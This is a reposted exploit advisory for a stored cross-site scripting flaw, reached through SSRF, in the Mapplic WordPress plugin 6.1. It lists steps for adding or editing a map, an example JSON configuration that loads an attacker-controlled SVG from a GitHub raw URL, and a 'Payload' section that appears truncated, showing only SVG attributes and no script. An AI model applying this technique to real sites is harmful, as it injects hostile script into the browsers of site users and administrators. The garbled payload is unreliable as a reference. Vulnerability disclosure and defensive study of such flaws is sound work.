WordPress Mapplic 6.1 SSRF / Cross Site Scripting ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on March 24th, 2021 📆 | 1528 Views ⚑

0

WordPress Mapplic 6.1 SSRF / Cross Site Scripting ≈ Packet Storm

#Title : Mapplic WordPress Plugins Stored XSS Injection via SSRF
#Date : 22/03/2021
#Author : Eagle Eye
#Vendor Homepage : https://mapplic.com/
#Version Affected : 6.1 and below
#Tested on : Google Chrome
#XSS Vuln from add/edit Map and bypass with host raw.githubusercontent.com

#1.Login as user
#2.Add Add/Edit Map
– [From Add]Enter github url with payload at “Map File (required)”
– [From Edit]Click raw and enter github url with payload

#Example [From edit]{“mapwidth”:”100″,”mapheight”:”100″,”minimap”:false,”clearbutton”:true,”zoombuttons”:true,”sidebar”:false,
“search”:false,”hovertip”:true,”mousewheel”:true,”fullscreen”:false,”deeplinking”:true,”mapfill”:false,
“zoom”:true,”alphabetic”:false,”zoomlimit”:”3″,”action”:”tooltip”,”categories”:[],
“levels”:[{“id”:”my-map”,”title”:”My Map”,”map”:”
https://raw.githubusercontent.com/Aizat197/xss_test/main/xss.svg
“,”minimap”:””,”locations”:[]}]}

#Payload
xmlns:xlink=”http://www.w3.org/1999/xlink” x=”0px”
y=”0px” width=”960px” height=”600px” viewBox=”0 0 960 600″
enable-background=”new 0 0 960 600″ xml:space=”preserve”>

Source link

Tagged with:



Leave a Reply